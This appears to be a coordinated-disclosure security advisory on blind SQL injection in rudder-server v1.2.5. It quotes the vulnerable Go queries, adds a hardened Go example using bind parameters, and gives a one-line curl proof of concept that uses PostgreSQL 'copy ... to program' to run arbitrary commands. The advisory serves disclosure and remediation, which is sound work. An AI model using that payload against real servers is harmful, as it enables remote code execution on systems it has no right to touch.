Coordinated Disclosure Timeline

Summary

Blind SQL injections are present in rudder-server that allow unauthenticated users to achieve Remote Code Execution.

Product

rudder-server

Tested Version

v1.2.5

Details

Issue 1: Blind SQL injection in warehouse/warehouse.go (GHSL-2022-097)

Endpoint: v1/warehouse/pending-events

sqlStatement = fmt.Sprintf(`SELECT COUNT(*)
                                FROM %[1]s
                                WHERE %[1]s.id > %[2]v AND %[1]s.%[4]s='%[3]s'`,
    warehouseutils.WarehouseStagingFilesTable, lastStagingFileID, sourceOrDestId, sourceOrDestColumn)

The source_id string is passed from user input, renamed into sourceOrDestId, then formatted into the query without prior sanitization.

This issue was found by the "Database query built from user-controlled sources" CodeQL query.

Issue 2 (Potential): Blind SQL injection in router/failed-events-manager.go

Endpoint: v1/failed-events

table := fmt.Sprintf(`%s_%s`, failedKeysTablePrefix, taskRunID)
sqlStatement := fmt.Sprintf(`SELECT %[1]s.destination_id, %[1]s.record_id
                                             FROM %[1]s `, table)
rows, err = fem.dbHandle.Query(sqlStatement)

The source_id string is passed from user input, renamed into taskRunID, then formatted as part of the table name without prior sanitization.

This issue was found by the "Database query built from user-controlled sources" CodeQL query.
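The two findings above differ in where the user input lands: Issue 1 splices it into a string literal, which a bind parameter fixes outright, while Issue 2 splices it into a table name, which cannot be bound and so must be validated as an identifier before it is quoted. The following Go program is an added example written for this advisory, not rudder-server's own code or its fix; the table name "wh_staging_files", the column set "source_id"/"destination_id", the "failed_keys" prefix and the sample ids are all constructed for illustration.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// identRe whitelists identifiers (table and column names) that originate
// outside the database layer. Assumption for this example: identifiers are
// plain snake_case ASCII no longer than PostgreSQL's 63-byte limit, so
// anything else is rejected outright.
var identRe = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]{0,62}$`)

// quoteIdentifier double-quotes an identifier the way PostgreSQL expects.
// The whitelist already excludes double quotes; the ReplaceAll is defence in
// depth in case the whitelist is ever loosened.
func quoteIdentifier(name string) (string, error) {
	if !identRe.MatchString(name) {
		return "", fmt.Errorf("invalid identifier %q", name)
	}
	return `"` + strings.ReplaceAll(name, `"`, `""`) + `"`, nil
}

// allowedColumns is the server-chosen set for sourceOrDestColumn
// (hypothetical names; the advisory does not list them).
var allowedColumns = map[string]bool{"source_id": true, "destination_id": true}

// buildPendingEventsQuery is the hardened shape of Issue 1. The user-supplied
// source/destination id becomes bind parameter $2 instead of being spliced
// into the SQL text, so a quote inside it can never close the string literal.
// The identifiers are validated and quoted because they cannot be bound.
func buildPendingEventsQuery(table, column string, lastStagingFileID int64, sourceOrDestID string) (string, []interface{}, error) {
	qTable, err := quoteIdentifier(table)
	if err != nil {
		return "", nil, err
	}
	if !allowedColumns[column] {
		return "", nil, fmt.Errorf("column %q is not selectable", column)
	}
	query := fmt.Sprintf(`SELECT COUNT(*) FROM %[1]s WHERE %[1]s.id > $1 AND %[1]s.%[2]s = $2`,
		qTable, column)
	args := []interface{}{lastStagingFileID, sourceOrDestID}
	return query, args, nil
}

// buildFailedKeysQuery is the hardened shape of Issue 2. A table name cannot
// be a bind parameter, so the user-controlled taskRunID suffix must pass the
// identifier whitelist before it is quoted and concatenated.
func buildFailedKeysQuery(prefix, taskRunID string) (string, error) {
	qTable, err := quoteIdentifier(fmt.Sprintf("%s_%s", prefix, taskRunID))
	if err != nil {
		return "", err
	}
	return fmt.Sprintf(`SELECT %[1]s.destination_id, %[1]s.record_id FROM %[1]s`, qTable), nil
}

func main() {
	// Constructed inputs: a benign id and one carrying a quote and a comment
	// marker, the shape the advisory's finding relies on.
	for _, id := range []string{"src_abc123", "test'; --"} {
		q, args, err := buildPendingEventsQuery("wh_staging_files", "source_id", 10, id)
		fmt.Printf("query=%s args=%v err=%v\n", q, args, err)
	}
	for _, run := range []string{"run_42", "x\"; DROP TABLE users; --"} {
		q, err := buildFailedKeysQuery("failed_keys", run)
		fmt.Printf("query=%s err=%v\n", q, err)
	}
}
```

Run it with `go run .`: the malicious id is returned inside args and never appears in the SQL text, and the malicious task run id is rejected before any query string is built. Passing the returned query and args to `db.Query(query, args...)` keeps the value out of the parser entirely, which is the property the original Sprintf-built statements lack.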

Impact

This issue may lead to Remote Code Execution (RCE) because the rudder role in PostgreSQL has superuser permissions by default.

Resources

This proof of concept allows attackers to run arbitrary commands as the postgres user.

curl -v -u "key": -X POST http://localhost:8080/v1/warehouse/pending-events -d "{\"source_id\": \"test'; copy (SELECT '') to program 'arbitrary_command_here'-- - \"}" --header "Content-Type: application/json"

CVE

Credit

This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2022-097 in any communication regarding this issue.